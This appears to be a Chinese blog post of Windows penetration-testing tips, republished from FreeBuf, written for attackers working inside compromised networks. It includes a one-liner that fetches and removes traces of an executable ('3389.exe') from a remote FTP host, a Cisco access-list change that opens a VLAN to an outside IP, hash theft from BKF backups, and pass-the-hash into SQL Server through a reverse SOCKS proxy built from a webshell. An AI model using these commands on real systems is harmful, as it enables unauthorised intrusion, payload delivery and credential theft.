前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >渗透测试技巧分享

渗透测试技巧分享

作者头像
FB客服
发布2018-02-01 18:14:11
8410
发布2018-02-01 18:14:11
举报
文章被收录于专栏:FreeBuf

1.AT時提示綁定句柄無效

經常碰到的這個問題,百度搜索的全部都沒一個能解決的。

正確的解決辦法是先在地址欄\\1.1.1.1 得到對方機器名,例如ADMINPC,然後,CMD

代码语言:javascript
复制
echo 1.1.1.1 ADMINPC >>C:\windows\system32\drivers\etc\hosts 

然後就可以at了,再也不會提示句柄無效了。

後記:其實也不需要對方的機器名,隨便echo 一個字符代替機器名即可。

2.ftp 一句話download

以前都是一個一個echo,然後ftp-s,很不方便,用下面的辦法吧

代码语言:javascript
复制
echo open 10.0.0.1> o&echo user 11>> o &echo get 3389.exe>> o &echo quit >> o &ftp -n -s:o &del /F /Q o

3.針對VISTA以上作業系統禁用NTHASH

高級系統默認都是禁止了LMHASH,在滲透途中是件很不方便的事,按照下圖可以啟動LMHASH,不過需要更改密碼后生效,如果用戶不更改密碼,LMHASH不會儲存,適用于比較敏感的目標,沒事天天改密碼的類型。這辦法適用於無WCE的時代.

捕获.gif(缩略图)

4. 修改cisco access list 避免繁瑣的”佛跳牆”過程

ssh 登陸IP,x.x.x.x

登陸

代码语言:javascript
复制
en IPE_CISCO#show access-list 查看下要配置的list 例如需要訪問的服務器在VLAN103 IPE_CISCO#config IPE_CISCO#terminal IPE_CISCO#access-list 103 permit host 10.1.6.66 //允許這個IP訪問VLAN103所有的伺服器 IPE_CISCO#int vlan 103 IPE_CISCO#ip access-group 103 out IPE_CISCO#exit

5.BKF文件的利用

Webshell 環境下,提權無門,發現一BKF,Copy Downlaod,虛擬機還原,WINPE 替換shift,get hash

然後去試試目標的pass.

6.基於替換系統hash的SQL 入侵

已知目標系統HASH:

代码语言:javascript
复制
administrator:zhu:00000000000000000000000000000000:4A59CF37F6xxxxxx

系統OS:2003,SQLSERVER 2008,目測該hash超過14位。(2003 默認為LMHASH,密碼超過14位則全000000000或者AA3DXXX)

已有webshell,提權無門,則通過Htran 反彈一條sock5代理,本地WCE替換為目標HASH,使用sock5代理連接MSSQL,認證選擇NT。

連上,完成。

7.注意Command.com

這個命令存在很久了在遙遠的WIN95~WIN2003一直存在著,一直被忽略的對象,其實,它也能替代CMD。

8.當ipc$遇到帶“號密碼時

代码语言:javascript
复制
password is:O*"#~)GbU[x net use \\127.0.0.1 "O*\"#~)GbU[x" /u:administrator

“號前加\即可解決問題。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2013-03-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档